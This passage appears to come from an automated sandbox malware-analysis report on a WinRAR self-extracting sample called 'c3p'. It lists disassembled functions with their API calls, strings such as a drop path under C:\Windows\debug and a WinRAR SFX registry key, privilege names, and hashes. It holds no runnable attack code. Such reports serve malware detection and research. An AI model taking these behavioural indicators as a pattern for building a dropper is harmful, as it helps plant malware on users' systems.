                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: _strlen$_swprintf_wcschr_wcscpy_wcsncpy_wcsrchr
                                                    • String ID: %08x
                                                    • API String ID: 3224783807-3682738293
                                                    • Opcode ID: 669695b007ae7977ae68f94f527ff9cdf8073c48786e5d668692956bf2e61faa
                                                    • Instruction ID: e58a7be8b996571638b2f6ad1ec06a3e3d381d83aac2c50ffb90b6f1b6e38a26
                                                    • Opcode Fuzzy Hash: 669695b007ae7977ae68f94f527ff9cdf8073c48786e5d668692956bf2e61faa
                                                    • Instruction Fuzzy Hash: B041C4326042196BEB24AA64DC46BFB73ACDF40354F14003BB905F62D1EB7CDD9086AE
                                                    APIs
                                                      • Part of subcall function 0040A297: _wcsrchr.LIBCMT ref: 0040A2AB
                                                    • _wcslen.LIBCMT ref: 0040A404
                                                    • _wcscpy.LIBCMT ref: 0040A439
                                                      • Part of subcall function 004107BF: _wcslen.LIBCMT ref: 004107C5
                                                      • Part of subcall function 004107BF: _wcsncat.LIBCMT ref: 004107DE
                                                    • _wcslen.LIBCMT ref: 0040A479
                                                    • _wcscpy.LIBCMT ref: 0040A4EB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: _wcslen$_wcscpy$_wcsncat_wcsrchr
                                                    • String ID: .rar$exe$rar$sfx
                                                    • API String ID: 1023950463-630704357
                                                    • Opcode ID: 00170f72afe64c2a8883e9400a74dbf0f9430e1a688d6dfe7c4028d913cd7223
                                                    • Instruction ID: 866274af749d2a12121155e11c715926870452bfbd3b748d7250beec9a0375e5
                                                    • Opcode Fuzzy Hash: 00170f72afe64c2a8883e9400a74dbf0f9430e1a688d6dfe7c4028d913cd7223
                                                    • Instruction Fuzzy Hash: 46312B2510432156D325AB219849ABB63989F11758B60983FFC82BB1D2E7FC9CF1D26F
                                                    APIs
                                                    • GetTickCount.KERNEL32 ref: 004191D2
                                                    • GetTickCount.KERNEL32 ref: 004191ED
                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00419201
                                                    • GetMessageW.USER32 ref: 00419212
                                                    • TranslateMessage.USER32(?), ref: 0041921C
                                                    • DispatchMessageW.USER32(?), ref: 00419226
                                                    • SetWindowPos.USER32(?,00000001,00000000,00000000,00000000,00000000,00000204,?), ref: 004192C6
                                                    • ShowWindow.USER32(?,00000005), ref: 004192D1
                                                    • SetWindowTextW.USER32(?,00000000), ref: 004192DB
                                                      • Part of subcall function 0041A086: __lock.LIBCMT ref: 0041A0A4
                                                      • Part of subcall function 0041A086: ___sbh_find_block.LIBCMT ref: 0041A0AF
                                                      • Part of subcall function 0041A086: ___sbh_free_block.LIBCMT ref: 0041A0BE
                                                      • Part of subcall function 0041A086: RtlFreeHeap.NTDLL(00000000,00000000,0042D5E0,0000000C,0041EB44,00000000,0042D8B8,0000000C,0041EB7E,00000000,0041A52B,?,00425008,00000004,0042DAA0,0000000C), ref: 0041A0EE
                                                      • Part of subcall function 0041A086: GetLastError.KERNEL32(?,00425008,00000004,0042DAA0,0000000C,00420EFE,00000000,0041A53A,00000000,00000000,00000000,?,0041E526,00000001,00000214), ref: 0041A0FF
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: Message$Window$CountTick$DispatchErrorFreeHeapLastPeekShowTextTranslate___sbh_find_block___sbh_free_block__lock
                                                    • String ID:
                                                    • API String ID: 1762286965-0
                                                    • Opcode ID: 7ec913425a3f3e2372b1638400142b3106039a82b1169f5c7905f957281089fd
                                                    • Instruction ID: d0124b5cfa2c812e1f5563f1aea717e10ae4c6884e62fce45702c6eeb0eaf713
                                                    • Opcode Fuzzy Hash: 7ec913425a3f3e2372b1638400142b3106039a82b1169f5c7905f957281089fd
                                                    • Instruction Fuzzy Hash: 1C414971A00219FFCB20DFA5C8888DEBBB9EF49755B10885AF805D7210C734DE81CBA5
                                                    APIs
                                                    • __EH_prolog.LIBCMT ref: 00408285
                                                    • GetLongPathNameW.KERNEL32 ref: 004082A8
                                                    • GetShortPathNameW.KERNEL32 ref: 004082C7
                                                      • Part of subcall function 0040A108: _wcslen.LIBCMT ref: 0040A10E
                                                      • Part of subcall function 004119E6: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,00000000,000000FF,00409A30,?,00000000,?,00409B4A,00000000,-00000002,?,00000000,?), ref: 004119FC
                                                    • _swprintf.LIBCMT ref: 0040835F
                                                      • Part of subcall function 00401B7B: __vswprintf_c_l.LIBCMT ref: 00401B8E
                                                    • MoveFileW.KERNEL32 ref: 004083CB
                                                    • MoveFileW.KERNEL32 ref: 0040840E
                                                      • Part of subcall function 00410792: _wcsncpy.LIBCMT ref: 004107A9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen_wcsncpy
                                                    • String ID: rtmp%d
                                                    • API String ID: 506780119-3303766350
                                                    • Opcode ID: 80432a155c85dd19641fc11820cc5f36f4e74055db2c5ac48604e141677261b6
                                                    • Instruction ID: d2d8fbff6cc24eb45d5551c3de5ba499806f7c616db77afc3440ff76d91260fd
                                                    • Opcode Fuzzy Hash: 80432a155c85dd19641fc11820cc5f36f4e74055db2c5ac48604e141677261b6
                                                    • Instruction Fuzzy Hash: 17417D71901229A6CF20EB61CE45EDF777CAF01384F4044BBB585B7192EB7C9B85CA68
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: _wcschr$__vswprintf_c_l_swprintf_wcsncpy
                                                    • String ID: %c:\$%s.%d.tmp
                                                    • API String ID: 2474501127-1021493711
                                                    • Opcode ID: d9a52ac475c9474a243f4b8a9bff4ce4a73f60a829f840133cf38701409695cc
                                                    • Instruction ID: c273d68f1ac1a5b69313dd0e580a3be66827efeb0eddacf25e0c0d309c5cb35b
                                                    • Opcode Fuzzy Hash: d9a52ac475c9474a243f4b8a9bff4ce4a73f60a829f840133cf38701409695cc
                                                    • Instruction Fuzzy Hash: 8501D623254311B9D620AB769C46D6B73BCEFC9361750483FF884E71C1EA38D4A5827B
                                                    APIs
                                                    • GetTickCount.KERNEL32 ref: 00418E60
                                                    • GetTickCount.KERNEL32 ref: 00418E65
                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00418E94
                                                    • TranslateMessage.USER32(?), ref: 00418EA2
                                                    • DispatchMessageW.USER32(?), ref: 00418EAC
                                                    • GetMessageW.USER32 ref: 00418EB9
                                                    • GetTickCount.KERNEL32 ref: 00418EBF
                                                    • VariantInit.OLEAUT32(?), ref: 00418ECC
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: Message$CountTick$DispatchInitPeekTranslateVariant
                                                    • String ID:
                                                    • API String ID: 4242828014-0
                                                    • Opcode ID: 24f8551c6bace4c49b29b4d161595cc50716ae70862bc317294abf2e64a79673
                                                    • Instruction ID: a43002fd53ce858f03131fbfb0a663e78a11023b27f2934e49aeb3ca8e517cdc
                                                    • Opcode Fuzzy Hash: 24f8551c6bace4c49b29b4d161595cc50716ae70862bc317294abf2e64a79673
                                                    • Instruction Fuzzy Hash: 9D21E871E00208AFDB10DFE4D888DEEBBBCEF48245F54486AF501E7250D6759A45CB65
                                                    APIs
                                                    • _wcslen.LIBCMT ref: 00419007
                                                    • _malloc.LIBCMT ref: 00419011
                                                      • Part of subcall function 0041CAFE: __FF_MSGBANNER.LIBCMT ref: 0041CB21
                                                      • Part of subcall function 0041CAFE: __NMSG_WRITE.LIBCMT ref: 0041CB28
                                                      • Part of subcall function 0041CAFE: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,00420EB4,00000000,00000001,00000000,?,0041EAED,00000018,0042D8B8,0000000C,0041EB7E), ref: 0041CB75
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: AllocateHeap_malloc_wcslen
                                                    • String ID: </p>$</style>$<br>$<style>
                                                    • API String ID: 4208083856-1200123991
                                                    • Opcode ID: e047901aca8098468097dccee60e958851f15d5b14811d4fc752e491ccb93117
                                                    • Instruction ID: bc0ed6908f7da2a61cf52ceaa21b11de33c8c296790c6dc460781c596d89ce32
                                                    • Opcode Fuzzy Hash: e047901aca8098468097dccee60e958851f15d5b14811d4fc752e491ccb93117
                                                    • Instruction Fuzzy Hash: 57410639641353A5EB305B298821BF777A4DF09754F28401BEDC1A72C1E7AC4DC2825E
                                                    APIs
                                                    • _malloc.LIBCMT ref: 0040D632
                                                      • Part of subcall function 0041CAFE: __FF_MSGBANNER.LIBCMT ref: 0041CB21
                                                      • Part of subcall function 0041CAFE: __NMSG_WRITE.LIBCMT ref: 0041CB28
                                                      • Part of subcall function 0041CAFE: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,00420EB4,00000000,00000001,00000000,?,0041EAED,00000018,0042D8B8,0000000C,0041EB7E), ref: 0041CB75
                                                    • _wcslen.LIBCMT ref: 0040D672
                                                    • _wcscat.LIBCMT ref: 0040D689
                                                    • _wcslen.LIBCMT ref: 0040D68F
                                                    • _wcscpy.LIBCMT ref: 0040D6BD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: _wcslen$AllocateHeap_malloc_wcscat_wcscpy
                                                    • String ID: }
                                                    • API String ID: 2020890722-4239843852
                                                    • Opcode ID: 5be53b1095a2ab32973f25b929dcd562014003380e9720f1ab8d773318b69248
                                                    • Instruction ID: 4ace2659f0a71f1c0e491d0e6fa7231a35ce44d2916887e281e468eea389b305
                                                    • Opcode Fuzzy Hash: 5be53b1095a2ab32973f25b929dcd562014003380e9720f1ab8d773318b69248
                                                    • Instruction Fuzzy Hash: F611E431E0131A19E721AAE48885BEF73A8DF10354F50087BE644E22D1EBBDA998865D
                                                    APIs
                                                      • Part of subcall function 0040D740: _wcscpy.LIBCMT ref: 0040D745
                                                    • RegCreateKeyExW.ADVAPI32(80000001,Software\WinRAR SFX,00000000,00000000,00000000,00020006,00000000,?,?,C:\Windows\debug\c3p), ref: 0040D7CA
                                                    • _wcslen.LIBCMT ref: 0040D7D8
                                                    • RegSetValueExW.ADVAPI32(?,?,00000000,00000001,?,?), ref: 0040D7F3
                                                    • RegCloseKey.ADVAPI32(?), ref: 0040D7FC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: CloseCreateValue_wcscpy_wcslen
                                                    • String ID: C:\Windows\debug\c3p$Software\WinRAR SFX
                                                    • API String ID: 3170333323-119503857
                                                    • Opcode ID: 100d00995d6a63fed18b24ca57a222256744f2a12b12eff38f0e8fa4f2736368
                                                    • Instruction ID: 0765010bb5bb6a0fe0cb384e36732af2640db4f3dedf99eb0a1494b53b81d458
                                                    • Opcode Fuzzy Hash: 100d00995d6a63fed18b24ca57a222256744f2a12b12eff38f0e8fa4f2736368
                                                    • Instruction Fuzzy Hash: D4014476900118FFEB21AF90DC86EDA7B6CEB04348F508077B90562061D7B45ED99669
                                                    APIs
                                                    • LoadLibraryW.KERNEL32(Crypt32.dll,00000020,0040CC01,00000020,?,?,00405CD9,?,00000020,00000001,00000000,?,00000010,?,?,?), ref: 0040CBB7
                                                    • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0040CBD0
                                                    • GetProcAddress.KERNEL32(00437800,CryptUnprotectMemory), ref: 0040CBDC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: AddressProc$LibraryLoad
                                                    • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                    • API String ID: 2238633743-1753850145
                                                    • Opcode ID: 48996cf74afa82a78abaf954274bd4a0a105598b289ae600398f177971e3c7d5
                                                    • Instruction ID: e0a478e82edebb696e3797d723582699ec8f98af1c0d384b4f87605a5cb2363b
                                                    • Opcode Fuzzy Hash: 48996cf74afa82a78abaf954274bd4a0a105598b289ae600398f177971e3c7d5
                                                    • Instruction Fuzzy Hash: C8E09230A043119FD7315F39A844B02FBE85FA0B10B55842FE984E3250C6B8E4518B1D
                                                    APIs
                                                    • __CreateFrameInfo.LIBCMT ref: 0041D96D
                                                      • Part of subcall function 00419F54: __getptd.LIBCMT ref: 00419F62
                                                      • Part of subcall function 00419F54: __getptd.LIBCMT ref: 00419F70
                                                    • __getptd.LIBCMT ref: 0041D977
                                                      • Part of subcall function 0041E574: __getptd_noexit.LIBCMT ref: 0041E577
                                                      • Part of subcall function 0041E574: __amsg_exit.LIBCMT ref: 0041E584
                                                    • __getptd.LIBCMT ref: 0041D985
                                                    • __getptd.LIBCMT ref: 0041D993
                                                    • __getptd.LIBCMT ref: 0041D99E
                                                    • _CallCatchBlock2.LIBCMT ref: 0041D9C4
                                                      • Part of subcall function 00419FF9: __CallSettingFrame@12.LIBCMT ref: 0041A045
                                                      • Part of subcall function 0041DA6B: __getptd.LIBCMT ref: 0041DA7A
                                                      • Part of subcall function 0041DA6B: __getptd.LIBCMT ref: 0041DA88
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                    • String ID:
                                                    • API String ID: 1602911419-0
                                                    • Opcode ID: 1319808b816f433426a306ed37f8bcc874ecca95cd1a94e5b102af76d65134e0
                                                    • Instruction ID: 0d1fdc40dcef433c7a3beecf315455fe806531323c29dc7904bac809b21f9e77
                                                    • Opcode Fuzzy Hash: 1319808b816f433426a306ed37f8bcc874ecca95cd1a94e5b102af76d65134e0
                                                    • Instruction Fuzzy Hash: 3911F6B5D00209EFDF00EFA5C445AED7BB1FF04318F10816AF814A7261DB789A959F59
                                                    APIs
                                                    • CharUpperW.USER32(?,?,?,?,00000400), ref: 0040D39D
                                                    • CharUpperW.USER32(?,?,?,?,?,00000400), ref: 0040D3C4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: CharUpper
                                                    • String ID: -$z(D
                                                    • API String ID: 9403516-2779374180
                                                    • Opcode ID: 763a059b28972daa6675efbfd6814a5cbc540f44e41c08162a8b73d0ca034a6a
                                                    • Instruction ID: 5a54b2b3934ec182270bd062ae1b5f3cde0699911e7ab2a93cdf09677cf63997
                                                    • Opcode Fuzzy Hash: 763a059b28972daa6675efbfd6814a5cbc540f44e41c08162a8b73d0ca034a6a
                                                    • Instruction Fuzzy Hash: A821C5B6C0411995DB207FE58D087BB66A8EB41344F048077E648B22D6DABCDECDCB9D
                                                    APIs
                                                    • __EH_prolog.LIBCMT ref: 00406638
                                                      • Part of subcall function 00402C53: __EH_prolog.LIBCMT ref: 00402C58
                                                    • SetFileSecurityW.ADVAPI32(00000000,00000007,?,?,?,?,00000000,00000000,00406CD8,00000000,?,?,004074FE,?,?,?), ref: 004066C0
                                                    • SetFileSecurityW.ADVAPI32(?,00000007,?,00000000,?,00000800,?,004074FE,?,?,?,?,?,00000000,0040812E,?), ref: 004066E7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: FileH_prologSecurity
                                                    • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                    • API String ID: 2167059215-639343689
                                                    • Opcode ID: 816d8b300ecf00b65235d1b3f1cf75912b99fde73c87ba82d4faddb76ed9a496
                                                    • Instruction ID: f1eaae1a436dcc63bac7601fe0c36cac3f9c6a8270284a771d117db77c86062f
                                                    • Opcode Fuzzy Hash: 816d8b300ecf00b65235d1b3f1cf75912b99fde73c87ba82d4faddb76ed9a496
                                                    • Instruction Fuzzy Hash: 0B21A271900259BADF21AF55DC02BAF7B789B44758F01403FB901B72C1C7BD4AA58BAE
                                                    APIs
                                                    • IsWindowVisible.USER32(?), ref: 0040DED9
                                                    • DialogBoxParamW.USER32(GETPASSWORD1,?,0040D168,?,?), ref: 0040DF1D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: DialogParamVisibleWindow
                                                    • String ID: GETPASSWORD1$z(D$z(D
                                                    • API String ID: 3157717868-2824312538
                                                    • Opcode ID: e88bfb975fa668df6f26be9bfa6701e2b4952b75b555e6c140b16e96fe307322
                                                    • Instruction ID: 4bdba699b0cca12474fd478aacd32274d4dad6070e46267843f5fb06d984f06e
                                                    • Opcode Fuzzy Hash: e88bfb975fa668df6f26be9bfa6701e2b4952b75b555e6c140b16e96fe307322
                                                    • Instruction Fuzzy Hash: 40117B31A002446BDB21DFB1EC40B973B94AB09758F18403AFE046B2C1D7BC8C54C7AD
                                                    APIs
                                                    • EndDialog.USER32 ref: 0040D122
                                                    • GetDlgItemTextW.USER32(?,00000066,00000800), ref: 0040D138
                                                    • SetDlgItemTextW.USER32(?,00000065,?), ref: 0040D152
                                                    • SetDlgItemTextW.USER32(?,00000066), ref: 0040D15D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
